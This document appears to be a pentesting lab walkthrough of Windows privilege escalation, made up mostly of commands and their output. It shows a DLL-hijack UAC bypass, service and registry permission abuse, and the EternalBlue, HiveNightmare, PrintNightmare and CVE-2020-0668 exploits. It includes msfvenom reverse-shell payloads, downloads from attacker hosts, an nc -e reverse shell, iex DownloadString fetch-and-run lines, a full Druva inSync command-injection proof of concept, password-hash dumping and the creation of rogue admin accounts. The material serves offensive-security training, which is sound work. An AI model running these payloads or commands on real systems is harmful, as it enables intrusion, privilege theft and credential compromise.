Attacking the OS
User Account Control
UAC makes apps run with normal user rights unless the user allows admin rights (elevated access). It uses integrity levels to limit risky actions and protect the system. UAC is not full security, but it adds extra safety by asking the user before raising privileges.
Standard Token: For normal tasks.
Elevated Token: Given after user agrees to UAC prompt for admin tasks.
Admin Approval Mode (AAM): New admin accounts get both standard and elevated tokens, starting at medium integrity.
UAC Configuration
The following table lists the 10 UAC Group Policy settings:
Admin Approval Mode for the built-in Administrator account
FilterAdministratorToken
Disabled
Controls whether the built-in Administrator account runs in Admin Approval Mode (AAM).
Allow UIAccess applications to prompt without secure desktop
EnableUIADesktopToggle
Disabled
Allows UIAccess apps to bypass the secure desktop (the gray protected screen).
Only elevate UIAccess apps in secure locations
EnableSecureUIAPaths
Enabled
UIAccess apps must reside in secure locations (e.g., C:\Windows\System32) to elevate.
Behavior of elevation prompt for administrators in AAM
ConsentPromptBehaviorAdmin
Prompt for consent for non-Windows binaries
Defines how admins are prompted when elevation is required. If ConsentPromptBehaviorAdmin = 0, elevation happens silently without any prompt (dangerous).
Behavior of elevation prompt for standard users
ConsentPromptBehaviorUser
Prompt for credentials on secure desktop
Defines how standard users are prompted when elevation is required.
Detect application installations and prompt for elevation
EnableInstallerDetection
Enabled (Home), Disabled (Enterprise)
Controls whether installer detection triggers UAC elevation prompts.
Only elevate signed and validated executables
ValidateAdminCodeSignatures
Disabled
If enabled, only signed executables can be elevated.
Run all administrators in Admin Approval Mode
EnableLUA
Enabled
Enables UAC for all administrative accounts.
Switch to secure desktop for elevation prompts
PromptOnSecureDesktop
Enabled
Displays elevation prompts on the secure desktop.
Virtualize file/registry write failures to per-user locations
EnableVirtualization
Enabled
Redirects legacy app write attempts (e.g., to Program Files or HKLM) to per-user locations.
UAC Bypass via DLL Hijacking (SystemPropertiesAdvanced.exe)
SystemPropertiesAdvanced.exe)Verify Current User
C:\mrci0x1> whoami /userUSER INFORMATION
----------------
User Name SID
================= ==============================================
winlpe-ws03\sarah S-1-5-21-3159276091-2191180989-3781274054-1002Verify Administrators Group Membership
C:\mrci0x1> net localgroup administratorsAlias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
mrb3n
sarah
The command completed successfully.Check Current Privileges
C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledVerify UAC Status
C:\mrci0x1> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUAHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1Verify UAC Prompt Level
C:\mrci0x1> REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdminHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5Check Windows Version
PS C:\mrci0x1> [environment]::OSVersion.VersionMajor Minor Build Revision
----- ----- ----- --------
10 0 14393 0
Check PATH Environment Variable
PS C:\htb> cmd /c echo %PATH%C:\Windows\system32;
C:\Windows;
C:\Windows\System32\Wbem;
C:\Windows\System32\WindowsPowerShell\v1.0\;
C:\Users\sarah\AppData\Local\Microsoft\WindowsApps;Generate Malicious DLL
mrci0x1@htb$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytesHost DLL with Python Server
mrci0x1@htb$ sudo python3 -m http.server 8080Download DLL to Target
PS C:\htb> curl http://10.10.14.41:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"Test DLL (Non-Elevated)
C:\htb> rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dllOn Attack Machine (Listener):
mrci0x1@htb$ nc -lnvp 8443listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.16] 49789
Microsoft Windows [Version 10.0.14393]
C:\Users\sarah> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledKill Rundll32 Processes
C:\htb> tasklist /svc | findstr "rundll32"
rundll32.exe 6300 N/A
rundll32.exe 5360 N/A
rundll32.exe 7044 N/A
C:\htb> taskkill /PID 7044 /F
SUCCESS: The process with PID 7044 has been terminated.
C:\htb> taskkill /PID 6300 /F
SUCCESS: The process with PID 6300 has been terminated.
C:\htb> taskkill /PID 5360 /F
SUCCESS: The process with PID 5360 has been terminated.Execute UAC Bypass (DLL Hijack)
C:\htb> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exeOn Attack Machine (Elevated Shell):
mrci0x1@htb$ nc -lvnp 8443listening on [any] 8443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.16] 50273
Microsoft Windows [Version 10.0.14393]
C:\Windows\system32>whoami
winlpe-ws03\sarah
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session DisabledWeak Permissions
Weak Service Permissions
Find Modifiable Service Binaries
C:\mrci0x1> SharpUp.exe audit=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name : WindscribeService
DisplayName : WindscribeService
Description : Manages the firewall and controls the VPN tunnel
State : Running
StartMode : Auto
PathName : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"Verify Service Permissions
C:\mrci0x1> accesschk.exe /accepteula -quvcw WindscribeServiceAccesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
WindscribeService
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESSAuthenticated Users have full control.
Modify Service Binary Path
C:\mrci0x1> sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"[SC] ChangeServiceConfig SUCCESSStop and Start Service
C:\mrci0x1> sc stop WindscribeServiceSERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x4
WAIT_HINT : 0x0C:\mrci0x1> sc start WindscribeService[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Command executed before service failure.
Confirm Admin Group Membership
C:\mrci0x1> net localgroup administratorsAlias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
htb-student
mrb3n
The command completed successfully.Privilege escalation successful.
Cleanup
C:\mrci0x1> sc config WindscribeService binpath="C:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\mrci0x1> sc start WindscribeServiceUnquoted Service Paths
Identify Unquoted Services
C:\htb>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """System Explorer Service SystemExplorerHelpService C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe Auto10.2 Query Service Config
C:\htb> sc qc SystemExplorerHelpService[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SystemExplorerHelpService
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Explorer Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystemVulnerable to path hijacking.
Permissive Registry ACLs
11.1 Enumerate Registry Permissions
C:\mrci0x1> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\servicesRW HKLM\System\CurrentControlSet\services\ModelManagerService KEY_ALL_ACCESS11.2 Modify ImagePath
PS C:\mrci0x1> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"ImagePath modified to execute payload.
Modifiable Registry Autorun Binaries
Enumerate Autoruns
PS C:\mrci0x1> Get-CimInstance Win32_StartupCommand | select Name,command,Location,User | flName : OneDrive
command : "C:\Users\mrb3n\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : WINLPE-WS01\mrb3n
Name : Windscribe
command : "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : WINLPE-WS01\mrb3n
Name : SecurityHealth
command : %windir%\system32\SecurityHealthSystray.exe
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : Public
Name : VMware User Process
command : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : Public
Name : VMware VM3DService Process
command : "C:\WINDOWS\system32\vm3dservice.exe" -u
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : PublicIf binary is writable, replacing it provides persistence.
Historical Example: UsoSvc (Patched CVE-2019-1322)
https://github.com/apt69/COMahawk
Kernel Exploits
The following the sample of table summarizes notable kernel exploits from Windows XP to Server 2016, covering remote code execution (RCE) and local privilege escalation (LPE) vulnerabilities:
Exploit
XP SP0-SP3
Vista SP0-SP2
2008 SP0-SP2
7 SP0-SP1
2008R2 SP0-SP1
8/8.1
2012/2012R2
10
2016
MS03-026
•
•
MS08-067
•
•
•
•
•
MS17-010
•
•
•
•
•
•
•
•
CVE-2021-36934
•
CVE-2021-1675
•
•
•
•
CVE-2020-0668
•
•
•
•
Missing Patches
Enumerate Installed Patches
PS C:\mrci0x1> systeminfo(System info output shortened for brevity)
Using wmic qfe list brief
C:\htb> wmic qfe list briefDescription HotFixID InstalledBy InstalledOn
Update KB4601056 NT AUTHORITY\SYSTEM 3/27/2021
Update KB4513661 1/9/2020
Security Update KB4516115 1/9/2020
Security Update KB4535680 NT AUTHORITY\SYSTEM 3/27/2021
Security Update KB5000908 NT AUTHORITY\SYSTEM 3/27/2021
Security Update KB5000808 NT AUTHORITY\SYSTEM 3/27/20211.3 Using Get-Hotfix
PS C:\mrci0x1> Get-HotfixVulnerability Mapping
Cross-referenced hotfixes against Microsoft Update Catalog and Several critical updates missing. System potentially vulnerable to:
MS08-067
MS17-010 (EternalBlue)
CVE-2021-36934 (HiveNightmare)
CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)
CVE-2020-0668
MS08-067 (Server Service RCE)
SMB Port Reachable
Port 445 open internally.
Launch Exploit
Metasploit:
msf > use exploit/windows/smb/ms08_067_netapiExploit successful — SYSTEM shell obtained.
MS17-010 (EternalBlue)
Launch Exploit
Metasploit:
msf > use exploit/windows/smb/ms17_010_eternalblueExploit successful — SYSTEM shell obtained.
CVE-2021-36934 (HiveNightmare)
Check SAM Permissions
C:\mrci0x1> icacls C:\Windows\System32\config\SAMC:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 filesRead access for unprivileged users confirmed.
Run HiveNightmare PoC
PS C:\Users\htb-student\Desktop> .\HiveNightmare.exeSuccess: SAM hive dumped to SAM-2021-08-07
Success: SECURITY hive dumped to SECURITY-2021-08-07
Success: SYSTEM hive dumped to SYSTEM-2021-08-07Extract Hashes
mrci0x1@htb[/htb]$ impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 localAdministrator:500:...:7796ee39fd3a9c3a1844556115ae1a54:::
Guest:501:...:31d6cfe0d16ae931b73c59d7e0c089c0:::
mrb3n:1001:...:7796ee39fd3a9c3a1844556115ae1a54:::
htb-student:1002:...:3c0e5d303ec84884ad5c3b7876a06ea6:::NTLM hashes extracted.
CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)
Verify Spooler Service
PS C:\mrci0x1> ls \\localhost\pipe\spoolssSpooler pipe exists.
Bypass Execution Policy
PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope ProcessExecution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): AExecute PoC
PS C:\mrci0x1> Import-Module .\CVE-2021-1675.ps1
PS C:\mrci0x1> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
[+] added user hacker as local administrator
[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dllVerify New Admin User
PS C:\mrci0x1> net user hackerUser name hacker
Full Name hacker
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set ?8/?9/?2021 12:12:01 PM
Password expires Never
Password changeable ?8/?9/?2021 12:12:01 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.Privilege escalation confirmed.
CVE-2020-0668 (Windows Service Tracing)
Verify Lack of Backup Privilege
C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledBackup/Restore privileges not assigned — suitable for CVE-2020-0668.
Generate Malicious Payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 645 bytes
Final size of exe file: 7168 bytesHost Payload
python3 -m http.server 8080Download Payload (twice)
twice to account for any corruption
wget http://10.10.14.41:8080/maintenanceservice.exe -O maintenanceservice.exe
wget http://10.10.14.41:8080/maintenanceservice.exe -O maintenanceservice2.exeRun Exploit
C:\mrci0x1> C:\Tools\CVE-2020-0668\CVE-2020-0668.exe maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"[+] Moving C:\Users\htb-student\Desktop\maintenanceservice.exe to C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
[+] Mounting \RPC Control onto C:\Users\htb-student\AppData\Local\Temp\nzrghuxz.leo
[+] Creating symbol links
[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.
[+] Sleeping for 5 seconds so the changes take effect
[+] Writing phonebook file to C:\Users\htb-student\AppData\Local\Temp\179739c5-5060-4088-a3e7-57c7e83a0828.pbk
[+] Cleaning up
[+] Done!Verify File Permissions
icacls "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"C:\Program Files (x86)\Mozilla Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
WINLPE-WS02\htb-student:(F)SYSTEM owns malicious file.
Replace Corrupt Binary
C:\mrci0x1> copy /Y maintenanceservice2.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"Start Metasploit Handler
sudo msfconsole -r handler.rc =[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the resource command to run commands from a file
[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
resource (handler.rc)> set LHOST 10.10.14.41
LHOST => 10.10.14.3
resource (handler.rc)> set LPORT 8443
LPORT => 8443
resource (handler.rc)> exploit
[*] Started HTTPS reverse handler on https://10.10.14.3:8443Start Service
C:\mrci0x1> net start MozillaMaintenanceThe service is not responding to the control function
More help is available by typing NET HELPMSG 2186Service started — payload executed.
Meterpreter Session Established
[*] Started HTTPS reverse handler on https://10.10.14.3:8443
[*] https://10.10.14.3:8443 handling request from 10.129.43.13; (UUID: syyuxztc) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (10.10.14.3:8443 -> 10.129.43.13:52047) at 2021-05-14 13:38:55 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WINLPE-WS02
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 6
Meterpreter : x64/windows
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb-student:1002:aad3b435b51404eeaad3b435b51404ee:3c0e5d303ec84884ad5c3b7876a06ea6:::
mrb3n:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c93428723187f868ae2f99d4fa66dceb:::Full SYSTEM shell obtained.
Vulnerable Services
Enumerating Installed Programs
PS C:\mrci0x1> wmic product get nameName
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4023057)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
VMware Tools
Druva inSync 6.6.3
Microsoft Update Health Tools
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4480730)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127Enumerating Local Ports
PS C:\mrci0x1> netstat -ano | findstr 6064 TCP 127.0.0.1:6064 0.0.0.0:0 LISTENING 3324
TCP 127.0.0.1:6064 127.0.0.1:50274 ESTABLISHED 3324
TCP 127.0.0.1:6064 127.0.0.1:50510 TIME_WAIT 0
TCP 127.0.0.1:6064 127.0.0.1:50511 TIME_WAIT 0
TCP 127.0.0.1:50274 127.0.0.1:6064 ESTABLISHED 3860Get Process by PID
PS C:\mrci0x1> get-process -Id 3324Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
149 10 1512 6748 3324 0 inSyncCPHwnet64Get Service Status
PS C:\mrci0x1> get-service | ? {$_.DisplayName -like 'Druva*'}Status Name DisplayName
------ ---- -----------
Running inSyncCPHService Druva inSync Client ServicePayload Command (Reverse Shell)
PS C:\mrci0x1> $cmd = "powershell -nop -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.41/shell.ps1')"Full PowerShell PoC
PS C:\mrci0x1>
$ErrorActionPreference = "Stop"
$cmd = "powershell -nop -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.41/shell.ps1')"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)
$s.Close()Prepare Reverse Shell Payload (shell.ps1)
PS C:\mrci0x1> Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443Serve the shell.ps1 file
mrci0x1@htb$ python3 -m http.server 8080Bypass Execution Policy
PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope ProcessStart Netcat Listener
mrci0x1@htb$ nc -lvnp 9443listening on [any] 9443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.7] 58611
Windows PowerShell running as user WINLPE-WS01$ on WINLPE-WS01
PS C:\WINDOWS\system32> whoami
nt authority\systemAlternative Payload (Add Admin User)
PS C:\mrci0x1> $cmd = "net user pwnd P@ssw0rd123 /add && net localgroup Administrators pwnd /add"Last updated